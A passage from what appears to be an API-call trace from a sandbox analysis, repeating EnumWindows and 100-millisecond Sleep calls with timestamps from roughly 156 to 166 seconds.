(lpEnumFunc=0x563dd0, lParam=0x550000) [0155.981] Sleep (dwMilliseconds=0x64) [0156.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.031] Sleep (dwMilliseconds=0x64) [0156.060] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.061] Sleep (dwMilliseconds=0x64) [0156.085] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.085] Sleep (dwMilliseconds=0x64) [0156.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.092] Sleep (dwMilliseconds=0x64) [0156.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.200] Sleep (dwMilliseconds=0x64) [0156.226] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.226] Sleep (dwMilliseconds=0x64) [0156.284] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.284] Sleep (dwMilliseconds=0x64) [0156.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.312] Sleep (dwMilliseconds=0x64) [0156.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.360] Sleep (dwMilliseconds=0x64) [0156.386] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.386] Sleep (dwMilliseconds=0x64) [0156.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.404] Sleep (dwMilliseconds=0x64) [0156.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.454] Sleep (dwMilliseconds=0x64) [0156.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.484] Sleep (dwMilliseconds=0x64) [0156.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.497] Sleep (dwMilliseconds=0x64) [0156.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.563] Sleep (dwMilliseconds=0x64) [0156.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.610] Sleep (dwMilliseconds=0x64) [0156.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.625] Sleep (dwMilliseconds=0x64) [0156.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.673] Sleep (dwMilliseconds=0x64) [0156.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.719] Sleep (dwMilliseconds=0x64) [0156.738] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.739] Sleep (dwMilliseconds=0x64) [0156.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.750] Sleep (dwMilliseconds=0x64) [0156.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.782] Sleep (dwMilliseconds=0x64) [0156.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.829] Sleep (dwMilliseconds=0x64) [0156.863] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.864] Sleep (dwMilliseconds=0x64) [0156.871] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.872] Sleep (dwMilliseconds=0x64) [0156.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.890] Sleep (dwMilliseconds=0x64) [0156.936] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.937] Sleep (dwMilliseconds=0x64) [0156.967] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.968] Sleep (dwMilliseconds=0x64) [0156.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0156.981] Sleep (dwMilliseconds=0x64) [0157.033] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.034] Sleep (dwMilliseconds=0x64) [0157.089] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.090] Sleep (dwMilliseconds=0x64) [0157.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.141] Sleep (dwMilliseconds=0x64) [0157.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.188] Sleep (dwMilliseconds=0x64) [0157.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.234] Sleep (dwMilliseconds=0x64) [0157.391] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.391] Sleep (dwMilliseconds=0x64) [0157.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.408] Sleep (dwMilliseconds=0x64) [0157.421] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.421] Sleep (dwMilliseconds=0x64) [0157.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.453] Sleep (dwMilliseconds=0x64) [0157.500] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.500] Sleep (dwMilliseconds=0x64) [0157.523] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.523] Sleep (dwMilliseconds=0x64) [0157.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.529] Sleep (dwMilliseconds=0x64) [0157.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.547] Sleep (dwMilliseconds=0x64) [0157.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.591] Sleep (dwMilliseconds=0x64) [0157.628] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.629] Sleep (dwMilliseconds=0x64) [0157.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.638] Sleep (dwMilliseconds=0x64) [0157.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.657] Sleep (dwMilliseconds=0x64) [0157.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.702] Sleep (dwMilliseconds=0x64) [0157.744] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.744] Sleep (dwMilliseconds=0x64) [0157.748] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.748] Sleep (dwMilliseconds=0x64) [0157.797] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.798] Sleep (dwMilliseconds=0x64) [0157.835] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.835] Sleep (dwMilliseconds=0x64) [0157.853] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.854] Sleep (dwMilliseconds=0x64) [0157.892] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.893] Sleep (dwMilliseconds=0x64) [0157.948] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.948] Sleep (dwMilliseconds=0x64) [0157.998] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0157.999] Sleep (dwMilliseconds=0x64) [0158.027] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.027] Sleep (dwMilliseconds=0x64) [0158.089] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.089] Sleep (dwMilliseconds=0x64) [0158.129] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.129] Sleep (dwMilliseconds=0x64) [0158.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.138] Sleep (dwMilliseconds=0x64) [0158.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.156] Sleep (dwMilliseconds=0x64) [0158.202] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.203] Sleep (dwMilliseconds=0x64) [0158.244] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.244] Sleep (dwMilliseconds=0x64) [0158.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.249] Sleep (dwMilliseconds=0x64) [0158.329] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.329] Sleep (dwMilliseconds=0x64) [0158.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.375] Sleep (dwMilliseconds=0x64) [0158.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.393] Sleep (dwMilliseconds=0x64) [0158.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.403] Sleep (dwMilliseconds=0x64) [0158.439] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.439] Sleep (dwMilliseconds=0x64) [0158.488] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.488] Sleep (dwMilliseconds=0x64) [0158.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.518] Sleep (dwMilliseconds=0x64) [0158.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.530] Sleep (dwMilliseconds=0x64) [0158.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.547] Sleep (dwMilliseconds=0x64) [0158.594] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.595] Sleep (dwMilliseconds=0x64) [0158.632] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.633] Sleep (dwMilliseconds=0x64) [0158.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.638] Sleep (dwMilliseconds=0x64) [0158.658] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.658] Sleep (dwMilliseconds=0x64) [0158.702] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.703] Sleep (dwMilliseconds=0x64) [0158.732] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.733] Sleep (dwMilliseconds=0x64) [0158.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.750] Sleep (dwMilliseconds=0x64) [0158.797] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.818] Sleep (dwMilliseconds=0x64) [0158.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.874] Sleep (dwMilliseconds=0x64) [0158.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.924] Sleep (dwMilliseconds=0x64) [0158.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0158.971] Sleep (dwMilliseconds=0x64) [0159.005] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.006] Sleep (dwMilliseconds=0x64) [0159.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.016] Sleep (dwMilliseconds=0x64) [0159.037] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.038] Sleep (dwMilliseconds=0x64) [0159.136] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.136] Sleep (dwMilliseconds=0x64) [0159.165] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.165] Sleep (dwMilliseconds=0x64) [0159.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.170] Sleep (dwMilliseconds=0x64) [0159.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.185] Sleep (dwMilliseconds=0x64) [0159.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.232] Sleep (dwMilliseconds=0x64) [0159.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.250] Sleep (dwMilliseconds=0x64) [0159.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.263] Sleep (dwMilliseconds=0x64) [0159.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.326] Sleep (dwMilliseconds=0x64) [0159.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.373] Sleep (dwMilliseconds=0x64) [0159.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.391] Sleep (dwMilliseconds=0x64) [0159.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.403] Sleep (dwMilliseconds=0x64) [0159.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.435] Sleep (dwMilliseconds=0x64) [0159.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.485] Sleep (dwMilliseconds=0x64) [0159.517] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.517] Sleep (dwMilliseconds=0x64) [0159.532] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.532] Sleep (dwMilliseconds=0x64) [0159.549] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.549] Sleep (dwMilliseconds=0x64) [0159.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.609] Sleep (dwMilliseconds=0x64) [0159.652] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.652] Sleep (dwMilliseconds=0x64) [0159.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.720] Sleep (dwMilliseconds=0x64) [0159.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.783] Sleep (dwMilliseconds=0x64) [0159.883] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.884] Sleep (dwMilliseconds=0x64) [0159.925] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0159.925] Sleep (dwMilliseconds=0x64) [0160.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.013] Sleep (dwMilliseconds=0x64) [0160.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.122] Sleep (dwMilliseconds=0x64) [0160.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.218] Sleep (dwMilliseconds=0x64) [0160.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.231] Sleep (dwMilliseconds=0x64) [0160.249] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.250] Sleep (dwMilliseconds=0x64) [0160.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.263] Sleep (dwMilliseconds=0x64) [0160.333] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.334] Sleep (dwMilliseconds=0x64) [0160.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.342] Sleep (dwMilliseconds=0x64) [0160.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.356] Sleep (dwMilliseconds=0x64) [0160.371] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.372] Sleep (dwMilliseconds=0x64) [0160.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.388] Sleep (dwMilliseconds=0x64) [0160.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.405] Sleep (dwMilliseconds=0x64) [0160.426] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.426] Sleep (dwMilliseconds=0x64) [0160.435] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.436] Sleep (dwMilliseconds=0x64) [0160.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.454] Sleep (dwMilliseconds=0x64) [0160.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.466] Sleep (dwMilliseconds=0x64) [0160.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.481] Sleep (dwMilliseconds=0x64) [0160.561] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.561] Sleep (dwMilliseconds=0x64) [0160.648] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.648] Sleep (dwMilliseconds=0x64) [0160.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.700] Sleep (dwMilliseconds=0x64) [0160.777] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.778] Sleep (dwMilliseconds=0x64) [0160.831] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0160.832] Sleep (dwMilliseconds=0x64) [0161.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.016] Sleep (dwMilliseconds=0x64) [0161.063] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.063] Sleep (dwMilliseconds=0x64) [0161.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.122] Sleep (dwMilliseconds=0x64) [0161.172] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.173] Sleep (dwMilliseconds=0x64) [0161.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.216] Sleep (dwMilliseconds=0x64) [0161.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.267] Sleep (dwMilliseconds=0x64) [0161.300] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.301] Sleep (dwMilliseconds=0x64) [0161.339] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.339] Sleep (dwMilliseconds=0x64) [0161.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.357] Sleep (dwMilliseconds=0x64) [0161.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.407] Sleep (dwMilliseconds=0x64) [0161.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.453] Sleep (dwMilliseconds=0x64) [0161.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.531] Sleep (dwMilliseconds=0x64) [0161.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.580] Sleep (dwMilliseconds=0x64) [0161.599] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.599] Sleep (dwMilliseconds=0x64) [0161.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.606] Sleep (dwMilliseconds=0x64) [0161.641] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.641] Sleep (dwMilliseconds=0x64) [0161.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.689] Sleep (dwMilliseconds=0x64) [0161.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.720] Sleep (dwMilliseconds=0x64) [0161.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.734] Sleep (dwMilliseconds=0x64) [0161.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.747] Sleep (dwMilliseconds=0x64) [0161.866] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.870] Sleep (dwMilliseconds=0x64) [0161.916] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.917] Sleep (dwMilliseconds=0x64) [0161.924] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.924] Sleep (dwMilliseconds=0x64) [0161.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0161.968] Sleep (dwMilliseconds=0x64) [0162.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.016] Sleep (dwMilliseconds=0x64) [0162.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.062] Sleep (dwMilliseconds=0x64) [0162.125] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.126] Sleep (dwMilliseconds=0x64) [0162.187] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.188] Sleep (dwMilliseconds=0x64) [0162.236] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.236] Sleep (dwMilliseconds=0x64) [0162.252] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.252] Sleep (dwMilliseconds=0x64) [0162.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.267] Sleep (dwMilliseconds=0x64) [0162.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.298] Sleep (dwMilliseconds=0x64) [0162.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.407] Sleep (dwMilliseconds=0x64) [0162.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.452] Sleep (dwMilliseconds=0x64) [0162.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.469] Sleep (dwMilliseconds=0x64) [0162.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.516] Sleep (dwMilliseconds=0x64) [0162.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.563] Sleep (dwMilliseconds=0x64) [0162.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.609] Sleep (dwMilliseconds=0x64) [0162.659] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.659] Sleep (dwMilliseconds=0x64) [0162.679] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.680] Sleep (dwMilliseconds=0x64) [0162.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.686] Sleep (dwMilliseconds=0x64) [0162.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.716] Sleep (dwMilliseconds=0x64) [0162.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.767] Sleep (dwMilliseconds=0x64) [0162.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.794] Sleep (dwMilliseconds=0x64) [0162.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.813] Sleep (dwMilliseconds=0x64) [0162.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.859] Sleep (dwMilliseconds=0x64) [0162.902] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.902] Sleep (dwMilliseconds=0x64) [0162.922] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.922] Sleep (dwMilliseconds=0x64) [0162.965] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0162.966] Sleep (dwMilliseconds=0x64) [0163.010] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.010] Sleep (dwMilliseconds=0x64) [0163.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.012] Sleep (dwMilliseconds=0x64) [0163.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.032] Sleep (dwMilliseconds=0x64) [0163.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.091] Sleep (dwMilliseconds=0x64) [0163.129] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.130] Sleep (dwMilliseconds=0x64) [0163.139] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.140] Sleep (dwMilliseconds=0x64) [0163.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.154] Sleep (dwMilliseconds=0x64) [0163.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.203] Sleep (dwMilliseconds=0x64) [0163.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.298] Sleep (dwMilliseconds=0x64) [0163.370] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.371] Sleep (dwMilliseconds=0x64) [0163.435] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.436] Sleep (dwMilliseconds=0x64) [0163.497] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.497] Sleep (dwMilliseconds=0x64) [0163.546] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.547] Sleep (dwMilliseconds=0x64) [0163.566] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.566] Sleep (dwMilliseconds=0x64) [0163.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.578] Sleep (dwMilliseconds=0x64) [0163.609] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.609] Sleep (dwMilliseconds=0x64) [0163.655] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.656] Sleep (dwMilliseconds=0x64) [0163.677] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.677] Sleep (dwMilliseconds=0x64) [0163.684] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.687] Sleep (dwMilliseconds=0x64) [0163.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.716] Sleep (dwMilliseconds=0x64) [0163.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.763] Sleep (dwMilliseconds=0x64) [0163.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.812] Sleep (dwMilliseconds=0x64) [0163.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.860] Sleep (dwMilliseconds=0x64) [0163.875] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.876] Sleep (dwMilliseconds=0x64) [0163.891] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.891] Sleep (dwMilliseconds=0x64) [0163.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.922] Sleep (dwMilliseconds=0x64) [0163.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.968] Sleep (dwMilliseconds=0x64) [0163.988] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0163.989] Sleep (dwMilliseconds=0x64) [0164.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.001] Sleep (dwMilliseconds=0x64) [0164.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.031] Sleep (dwMilliseconds=0x64) [0164.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.093] Sleep (dwMilliseconds=0x64) [0164.129] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.130] Sleep (dwMilliseconds=0x64) [0164.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.140] Sleep (dwMilliseconds=0x64) [0164.153] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.153] Sleep (dwMilliseconds=0x64) [0164.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.204] Sleep (dwMilliseconds=0x64) [0164.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.251] Sleep (dwMilliseconds=0x64) [0164.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.313] Sleep (dwMilliseconds=0x64) [0164.417] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.418] Sleep (dwMilliseconds=0x64) [0164.504] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.504] Sleep (dwMilliseconds=0x64) [0164.551] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.572] Sleep (dwMilliseconds=0x64) [0164.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.626] Sleep (dwMilliseconds=0x64) [0164.644] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.644] Sleep (dwMilliseconds=0x64) [0164.653] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.653] Sleep (dwMilliseconds=0x64) [0164.686] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.686] Sleep (dwMilliseconds=0x64) [0164.735] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.735] Sleep (dwMilliseconds=0x64) [0164.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.779] Sleep (dwMilliseconds=0x64) [0164.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.824] Sleep (dwMilliseconds=0x64) [0164.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.874] Sleep (dwMilliseconds=0x64) [0164.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.923] Sleep (dwMilliseconds=0x64) [0164.958] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0164.958] Sleep (dwMilliseconds=0x64) [0165.021] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.022] Sleep (dwMilliseconds=0x64) [0165.069] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.070] Sleep (dwMilliseconds=0x64) [0165.128] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.129] Sleep (dwMilliseconds=0x64) [0165.189] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.190] Sleep (dwMilliseconds=0x64) [0165.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.420] Sleep (dwMilliseconds=0x64) [0165.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.469] Sleep (dwMilliseconds=0x64) [0165.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.513] Sleep (dwMilliseconds=0x64) [0165.573] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.574] Sleep (dwMilliseconds=0x64) [0165.599] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.600] Sleep (dwMilliseconds=0x64) [0165.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.673] Sleep (dwMilliseconds=0x64) [0165.706] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.706] Sleep (dwMilliseconds=0x64) [0165.747] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0165.751] Sleep (dwMilliseconds=0x64) [0165.775] 